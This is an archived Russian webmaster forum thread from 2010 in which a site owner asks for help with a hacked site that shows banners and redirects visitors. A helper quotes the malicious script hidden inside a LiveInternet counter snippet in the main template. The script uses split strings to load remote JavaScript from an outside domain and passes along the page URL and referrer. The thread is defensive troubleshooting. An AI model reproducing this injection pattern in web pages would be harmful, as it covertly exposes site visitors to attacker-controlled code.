rbhosting 0 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 с www.fermer02.ru чтото не понятное твориться, пользователи жалуются что баннер проскакивает, вроде вскрыли и какой то скрипт воткнули, прошу посмотреть и подсказать в чем может быть проблема... Ссылка на сообщение Поделиться на других сайтах
Kolbaser 33 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Я не видел баннер, в коде вроде не видно. Ссылка на сообщение Поделиться на других сайтах
celsoft 6259 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Прямых зловредных кодов на странице нет, но сайт перекидывает на порно, и проблема есть, поэтому удаляйте все сторонние JS коды, реклама, флешки и прочее. Ссылка на сообщение Поделиться на других сайтах
rbhosting 0 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Автор скрины этих скриптов, где сидят не могу понять, вроде изрыл, предположительно на форуме гдето.... кто подскажет чем их найти, поиск по коду не чего не дает Ссылка на сообщение Поделиться на других сайтах
celsoft 6259 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 О чем я и говорю, зловредный код, у вас во вставленном коде счетчика <!--LiveInternet counter--><script type="text/javascript"><!-- document.write("<a href='http://www.liveinternet.ru/click;fermer_all' "+ "target=_blank><img src='http://counter.yadro.ru/hit;fermer_all?t18.15;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+ ";"+Math.random()+ "' alt='' title='LiveInternet: показано число просмотров за 24"+ " часа, посетителей за 24 часа и за сегодня' "+ "border='0' width='88' height='31'><\/a>") var lankru_html = '';lankru_html += '<scr' + 'ipt language="JavaSc' + 'ript" '; lankru_html += 'src="http://kn' + 'alru.ru/js.php?id=32240'; lankru_html += '&dd=3&url=' + encodeURIComponent(document.location); lankru_html += '&ref=' + encodeURIComponent(document.referrer); lankru_html += '&rnd=' + Math.random() + '"></scr' + 'ipt>';document.write(lankru_html); //--></script><!--/LiveInternet--> [/code] Ссылка на сообщение Поделиться на других сайтах
rbhosting 0 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Автор все устранил спасибо, а как теперь узнать каким образом его туда воткнули, где может быть дырка? Ссылка на сообщение Поделиться на других сайтах
celsoft 6259 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 все устранил спасибо, а как теперь узнать каким образом его туда воткнули, где может быть дырка? где он у вас стоял? в шаблоне? смотрите тех кто имеет доступ установке этого кода. Если стояло в шаблоне, значит возможно уязвим ваш доступ по FTP. Ссылка на сообщение Поделиться на других сайтах
rbhosting 0 Опубликовано: 15 января 2010 Рассказать Опубликовано: 15 января 2010 Автор да стаял в главном шаблоне main.tpl Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Архивировано
Эта тема находится в архиве и закрыта для публикации сообщений.